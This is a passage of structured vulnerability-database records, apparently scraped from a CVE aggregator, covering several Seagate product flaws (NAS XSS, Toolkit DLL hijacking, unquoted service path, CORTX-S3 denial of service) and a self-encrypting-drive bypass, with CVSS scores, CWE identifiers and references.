"url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-12299",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting in filebrowser in Seagate NAS OS version 4.3.15.1 allows attackers to execute JavaScript via uploaded file names."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170",
"refsource": "MISC",
"url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-12299",
"datePublished": "2019-05-13T12:35:33.000Z",
"dateReserved": "2018-06-13T00:00:00.000Z",
"dateUpdated": "2024-08-05T08:30:59.654Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-9267 (GCVE-0-2025-9267)
Vulnerability from cvelistv5 – Published: 2025-09-26 12:27 – Updated: 2025-09-29 14:37
VLAI
Summary
In Seagate Toolkit on Windows a vulnerability exists in the Toolkit Installer prior to versions 2.35.0.6 where it attempts to load DLLs from the current working directory without validating their origin or integrity. This behavior can be exploited by placing a malicious DLL in the same directory as the installer executable, leading to arbitrary code execution with the privileges of the user running the installer. The issue stems from the use of insecure DLL loading practices, such as relying on relative paths or failing to specify fully qualified paths when invoking system libraries.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
Assigner
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-9267",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-26T12:54:52.245929Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-09-26T12:54:57.812Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-09-29T14:37:53.583Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://github.com/Tiger3080/CVE-2025-9267"
}
],
"title": "CVE Program Container",
"x_generator": {
"engine": "ADPogram 0.0.1"
}
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"platforms": [
"Windows"
],
"product": "Toolkit",
"vendor": "Seagate",
"versions": [
{
"lessThan": "2.35.0.6",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(252, 252, 252);\"\u003eIn Seagate Toolkit on Windows a\u0026nbsp;vulnerability exists in the Toolkit Installer prior to\u0026nbsp;versions 2.35.0.6 where it attempts to load DLLs from the current working directory without validating their origin or integrity. This behavior can be exploited by placing a malicious DLL in the same directory as the installer executable, leading to arbitrary code execution with the privileges of the user running the installer. The issue stems from the use of insecure DLL loading practices, such as relying on relative paths or failing to specify fully qualified paths when invoking system libraries.\n\n\u003c/span\u003e\u003cbr\u003e"
}
],
"value": "In Seagate Toolkit on Windows a\u00a0vulnerability exists in the Toolkit Installer prior to\u00a0versions 2.35.0.6 where it attempts to load DLLs from the current working directory without validating their origin or integrity. This behavior can be exploited by placing a malicious DLL in the same directory as the installer executable, leading to arbitrary code execution with the privileges of the user running the installer. The issue stems from the use of insecure DLL loading practices, such as relying on relative paths or failing to specify fully qualified paths when invoking system libraries."
}
],
"impacts": [
{
"capecId": "CAPEC-471",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-471 Search Order Hijacking"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"baseScore": 7,
"baseSeverity": "HIGH",
"privilegesRequired": "HIGH",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-427",
"description": "CWE-427 Uncontrolled Search Path Element",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-426",
"description": "CWE-426 Untrusted Search Path",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-26T12:27:51.651Z",
"orgId": "c6156efd-4bd0-48d7-8520-680200527478",
"shortName": "Seagate"
},
"references": [
{
"url": "https://www.seagate.com/product-security/#security-advisories"
},
{
"url": "https://www.seagate.com/support/software/toolkit/"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "c6156efd-4bd0-48d7-8520-680200527478",
"assignerShortName": "Seagate",
"cveId": "CVE-2025-9267",
"datePublished": "2025-09-26T12:27:51.651Z",
"dateReserved": "2025-08-20T14:44:11.379Z",
"dateUpdated": "2025-09-29T14:37:53.583Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-9043 (GCVE-0-2025-9043)
Vulnerability from cvelistv5 – Published: 2025-08-14 16:27 – Updated: 2025-08-21 14:16
VLAI
Summary
The service executable path in Seagate Toolkit on Versions prior to 2.34.0.33 on Windows allows an attacker with Admin privileges to exploit a vulnerability as classified under CWE-428: Unquoted Search Path or Element. An attacker with write permissions to the root could place a malicious Program.exe file, which would execute with SYSTEM privileges.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-428 - Unquoted Search Path or Element
Assigner
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-9043",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-08-14T18:42:31.162132Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-08-14T19:21:59.342Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-08-21T14:16:46.354Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"timeline": [
{
"lang": "en",
"time": "2025-08-21T14:16:46.266Z",
"value": "Previously entered references were removed because they are not applicable to this CVE Record."
}
],
"title": "CVE Program Container",
"x_generator": {
"engine": "ADPogram 0.0.1"
}
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"platforms": [
"Windows"
],
"product": "Toolkit",
"vendor": "Seagate",
"versions": [
{
"lessThan": "2.34.0.33",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "The service executable path in Seagate Toolkit on Versions prior to 2.34.0.33 on Windows allows an attacker with Admin privileges to exploit a vulnerability as classified under CWE-428: Unquoted Search Path or Element. An attacker with write permissions to the root could place a malicious Program.exe file, which would execute with SYSTEM privileges."
}
],
"value": "The service executable path in Seagate Toolkit on Versions prior to 2.34.0.33 on Windows allows an attacker with Admin privileges to exploit a vulnerability as classified under CWE-428: Unquoted Search Path or Element. An attacker with write permissions to the root could place a malicious Program.exe file, which would execute with SYSTEM privileges."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"privilegesRequired": "HIGH",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-428",
"description": "CWE-428 Unquoted Search Path or Element",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-08-21T14:04:46.566Z",
"orgId": "c6156efd-4bd0-48d7-8520-680200527478",
"shortName": "Seagate"
},
"references": [
{
"url": "https://www.seagate.com/support/software/toolkit/"
},
{
"url": "https://www.seagate.com/product-security/#security-advisories"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "c6156efd-4bd0-48d7-8520-680200527478",
"assignerShortName": "Seagate",
"cveId": "CVE-2025-9043",
"datePublished": "2025-08-14T16:27:05.364Z",
"dateReserved": "2025-08-14T15:57:53.887Z",
"dateUpdated": "2025-08-21T14:16:46.354Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-43429 (GCVE-0-2021-43429)
Vulnerability from cvelistv5 – Published: 2022-04-07 16:52 – Updated: 2024-08-04 03:55
VLAI
Summary
A Denial of Service vulnerability exists in CORTX-S3 Server as of 11/7/2021 via the mempool_destroy method due to a failture to release locks pool->lock.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/Seagate/cortx-s3server/issues/1037 | x_refsource_MISC |
| https://github.com/Seagate/cortx-s3server/pull/1041 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T03:55:28.993Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/Seagate/cortx-s3server/issues/1037"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/Seagate/cortx-s3server/pull/1041"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A Denial of Service vulnerability exists in CORTX-S3 Server as of 11/7/2021 via the mempool_destroy method due to a failture to release locks pool-\u003elock."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-04-07T16:52:25.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/Seagate/cortx-s3server/issues/1037"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/Seagate/cortx-s3server/pull/1041"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-43429",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A Denial of Service vulnerability exists in CORTX-S3 Server as of 11/7/2021 via the mempool_destroy method due to a failture to release locks pool-\u003elock."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/Seagate/cortx-s3server/issues/1037",
"refsource": "MISC",
"url": "https://github.com/Seagate/cortx-s3server/issues/1037"
},
{
"name": "https://github.com/Seagate/cortx-s3server/pull/1041",
"refsource": "MISC",
"url": "https://github.com/Seagate/cortx-s3server/pull/1041"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-43429",
"datePublished": "2022-04-07T16:52:25.000Z",
"dateReserved": "2021-11-08T00:00:00.000Z",
"dateUpdated": "2024-08-04T03:55:28.993Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
VAR-201711-0015
Vulnerability from variot - Updated: 2025-04-20 23:32Samsung 850 Pro and PM851 solid-state drives and Seagate ST500LT015 and ST500LT025 hard disk drives, when in sleep mode and operating in Opal or eDrive mode on Lenovo ThinkPad T440s laptops with BIOS 2.32; ThinkPad W541 laptops with BIOS 2.21; Dell Latitude E6410 laptops with BIOS A16; or Latitude E6430 laptops with BIOS A16, allow physically proximate attackers to bypass self-encrypting drive (SED) protection by leveraging failure to detect when SATA drives are unplugged in Sleep Mode, aka a "Hot Plug attack.". Samsung 850 Pro/PM851 Solid state drives and Seagate ST500LT015/ST500LT025 There are vulnerabilities in hard disk drives that can bypass security functions.Information may be obtained. LenovoThinkPadT440slaptop is a laptop from Lenovo China. The DellLatitudeE6410laptop is a laptop from Dell. Samsung850Pro, etc. are all hard drives used in laptops. The Samsung850Pro is a hard disk manufactured by Samsung in South Korea. The Seagate ST500LT015 is a hard drive manufactured by Seagate. There are security holes in the Samsung850Pro, PM851 SSD, SeagateST500LT015 and ST500LT025 hard drives on several devices. An attacker could exploit this vulnerability to bypass self-encrypting hard disk (SED) protection. Samsung/Seagate Self-Encrypting Drive Protection are prone to a local security-bypass vulnerability. This may aid in further attacks. The following products are vulnerable: Seagate ST500LT015 and ST500LT025 Samsung 850 Pro and PM851. Samsung 850 Pro etc. The following products are affected: Lenovo ThinkPad T440s laptop using BIOS version 2.32; ThinkPad W541 laptop using BIOS version 2.21; Dell Latitude E6410 laptop using BIOS version A16; Latitude E6430 laptop using BIOS version A16
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201711-0015",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "pm851",
"scope": "eq",
"trust": 1.6,
"vendor": "samsung",
"version": null
},
{
"model": "850 pro",
"scope": "eq",
"trust": 1.6,
"vendor": "samsung",
"version": null
},
{
"model": "pm851",
"scope": null,
"trust": 1.4,
"vendor": "samsung",
"version": null
},
{
"model": "st500lt015",
"scope": "eq",
"trust": 1.0,
"vendor": "seagate",
"version": null
},
{
"model": "st500lt025",
"scope": "eq",
"trust": 1.0,
"vendor": "seagate",
"version": null
},
{
"model": "st500lt015",
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"model": "st500lt025",
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"model": "850 pro",
"scope": null,
"trust": 0.8,
"vendor": "samsung",
"version": null
},
{
"model": "pro",
"scope": "eq",
"trust": 0.6,
"vendor": "samsung",
"version": "850"
},
{
"model": "technology st500lt015",
"scope": null,
"trust": 0.6,
"vendor": "seagate",
"version": null
},
{
"model": "technology st500lt025",
"scope": null,
"trust": 0.6,
"vendor": "seagate",
"version": null
},
{
"model": "st500lt025",
"scope": "eq",
"trust": 0.3,
"vendor": "seagate",
"version": "0"
},
{
"model": "st500lt015",
"scope": "eq",
"trust": 0.3,
"vendor": "seagate",
"version": "0"
},
{
"model": "pm851",
"scope": "eq",
"trust": 0.3,
"vendor": "samsung",
"version": "0"
},
{
"model": "pro",
"scope": "eq",
"trust": 0.3,
"vendor": "samsung",
"version": "8500"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38305"
},
{
"db": "BID",
"id": "102336"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008068"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1082"
},
{
"db": "NVD",
"id": "CVE-2015-7267"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:seagate:st500lt015_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:seagate:st500lt025_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:samsung:850_pro_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:samsung:pm851_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008068"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Boteanu and Kevvie Fowler of KPMG.",
"sources": [
{
"db": "BID",
"id": "102336"
}
],
"trust": 0.3
},
"cve": "CVE-2015-7267",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 1.9,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.4,
"id": "CVE-2015-7267",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 1.9,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.4,
"id": "CNVD-2017-38305",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 1.9,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.4,
"id": "VHN-85228",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:L/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "PHYSICAL",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.5,
"id": "CVE-2015-7267",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-7267",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2015-7267",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2017-38305",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201711-1082",
"trust": 0.6,
"value": "LOW"
},
{
"author": "VULHUB",
"id": "VHN-85228",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38305"
},
{
"db": "VULHUB",
"id": "VHN-85228"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008068"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1082"
},
{
"db": "NVD",
"id": "CVE-2015-7267"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samsung 850 Pro and PM851 solid-state drives and Seagate ST500LT015 and ST500LT025 hard disk drives, when in sleep mode and operating in Opal or eDrive mode on Lenovo ThinkPad T440s laptops with BIOS 2.32; ThinkPad W541 laptops with BIOS 2.21; Dell Latitude E6410 laptops with BIOS A16; or Latitude E6430 laptops with BIOS A16, allow physically proximate attackers to bypass self-encrypting drive (SED) protection by leveraging failure to detect when SATA drives are unplugged in Sleep Mode, aka a \"Hot Plug attack.\". Samsung 850 Pro/PM851 Solid state drives and Seagate ST500LT015/ST500LT025 There are vulnerabilities in hard disk drives that can bypass security functions.Information may be obtained. LenovoThinkPadT440slaptop is a laptop from Lenovo China. The DellLatitudeE6410laptop is a laptop from Dell. Samsung850Pro, etc. are all hard drives used in laptops. The Samsung850Pro is a hard disk manufactured by Samsung in South Korea. The Seagate ST500LT015 is a hard drive manufactured by Seagate. There are security holes in the Samsung850Pro, PM851 SSD, SeagateST500LT015 and ST500LT025 hard drives on several devices. An attacker could exploit this vulnerability to bypass self-encrypting hard disk (SED) protection. Samsung/Seagate Self-Encrypting Drive Protection are prone to a local security-bypass vulnerability. This may aid in further attacks. \nThe following products are vulnerable:\nSeagate ST500LT015 and ST500LT025\nSamsung 850 Pro and PM851. Samsung 850 Pro etc. The following products are affected: Lenovo ThinkPad T440s laptop using BIOS version 2.32; ThinkPad W541 laptop using BIOS version 2.21; Dell Latitude E6410 laptop using BIOS version A16; Latitude E6430 laptop using BIOS version A16",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-7267"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008068"
},
{
"db": "CNVD",
"id": "CNVD-2017-38305"
},
{
"db": "BID",
"id": "102336"
},
{
"db": "VULHUB",
"id": "VHN-85228"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2015-7267",
"trust": 3.4
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008068",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1082",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-38305",
"trust": 0.6
},
{
"db": "BID",
"id": "102336",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-85228",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38305"
},
{
"db": "VULHUB",
"id": "VHN-85228"
},
{
"db": "BID",
"id": "102336"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008068"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-1082"
},
{
"db": "NVD",
"id": "CVE-2015-7267"
}
]
},
"id": "VAR-201711-0015",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38305"
},
{
"db": "VULHUB",
"id": "VHN-85228"
}
],
"trust": 1.4942857200000002
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-38305"
}
]
},
"last_update_date": "2025-04-20T23:32:03.075000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Samsung 850 Pro",
"trust": 0.8,
"url": "http://www.samsung.com/semiconductor/minisite/jp/ssd/consumer/850pro/"
},
{
"title": "Samsung PM851 Solid State Drive",
"trust": 0.8,
"url": "https://www.samsung.com/us/business/oem-solutions/pdfs/PM851-SSD-ProdOverview.pdf"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.seagate.com/jp/ja/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008068"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-254",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-85228"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008068"
},
{
"db": "NVD",
"id": "CVE-2015-7267"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.4,
"url": "https://www.blackhat.com/docs/eu-15/materials/eu-15-boteanu-bypassing-self-encrypting-drives-sed-in-enterprise-environments-wp.pdf"
},
{
"trust": 2.0,
"url": "https://www.infoworld.com/article/3004913/encryption/self-encrypting-drives-are-hardly-any-better-than-software-based-encryption.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7267"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-7267"
},
{
"trust": 0.3,
"url": "www.samsung.com"
},
{
"trust": 0.3,
